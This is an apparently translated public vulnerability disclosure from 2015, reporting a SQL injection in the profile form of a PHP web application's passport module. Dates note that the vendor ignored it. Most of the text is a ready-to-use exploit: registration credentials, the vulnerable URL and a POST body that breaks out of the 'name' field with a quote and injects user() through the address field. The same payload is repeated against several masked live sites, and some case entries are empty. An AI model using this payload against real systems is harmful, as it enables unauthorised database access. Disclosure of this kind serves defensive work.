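2015-10-15: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2015-11-29: The vendor has actively ignored the vulnerability; details are disclosed to the public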
RT
Official site: http://**.**.**.**
Download: http://**.**.**.**/download/detail-2.html
PHP version, latest release:
exp and cases:
Case 1:
Register: http://**.**.**.**/passport/
admintest/123456
Login: http://**.**.**.**/passport/?type=login
exp: http://**.**.**.**/passport/index.php?action=manage&mtype=information&backurl=%2Fpassport%2Findex.php%3Ftype%3Dmanage%26mtype%3Dinformation
post: email=123%**.**.**.**&city=1&sex=1&old=1999&name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'&address=,p_address=user()#&submit=%E6%8F%90%E4%BA%A4
Case 2:
http://**.**.**.**
admintest
123456
http://**.**.**.**/passport/index.php?action=manage&mtype=information&backurl=%2Fpassport%2Findex.php%3Ftype%3Dmanage%26mtype%3Dinformation
post: email=123%**.**.**.**&city=1&sex=1&old=1999&name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'&address=,p_address=user()#&submit=%E6%8F%90%E4%BA%A4
Case 3:
**.**.**.**/passport/
admintest/123456
**.**.**.**/passport/index.php?action=manage&mtype=information&backurl=%2Fpassport%2Findex.php%3Ftype%3Dmanage%26mtype%3Dinformation
post: email=123%**.**.**.**&city=1&sex=1&old=1999&name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'&address=,p_address=user()#&submit=%E6%8F%90%E4%BA%A4
Case 5:
http://**.**.**.**/passport/
admintest/123456
http://**.**.**.**/passport/index.php?action=manage&mtype=information&backurl=%2Fpassport%2Findex.php%3Ftype%3Dmanage%26mtype%3Dinformation
post: email=123%**.**.**.**&city=1&sex=1&old=1999&name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'&address=,p_address=user()#&submit=%E6%8F%90%E4%BA%A4
Case 6:
Case 7:
As above
Filtering
Unable to contact the vendor, or the vendor actively refused